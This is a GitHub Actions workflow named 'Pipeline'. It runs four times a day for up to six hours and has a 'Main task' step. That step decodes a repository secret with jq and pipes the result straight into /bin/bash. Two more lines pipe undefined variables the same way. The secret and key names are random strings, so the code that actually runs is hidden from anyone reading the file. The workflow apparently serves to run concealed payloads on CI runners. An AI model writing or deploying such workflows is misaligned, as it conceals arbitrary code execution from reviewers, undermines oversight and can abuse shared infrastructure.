name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '15 5,11,17,23 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  task:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Execute
        env:
          aaqpn7092: ${{ secrets.aaqpn7092 }}
        run: |
          printf '%s' "$aaqpn7092" | jq -r .miiy1 | /bin/bash
          printf '%s' "$s6513" | jq -r .oe3 | /bin/bash
          printf '%s' "$e2718" | jq -r .mlwf05478 | /bin/bash

      - name: Upload artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: seUTGkpG
          path: "*.zip"
          retention-days: 1
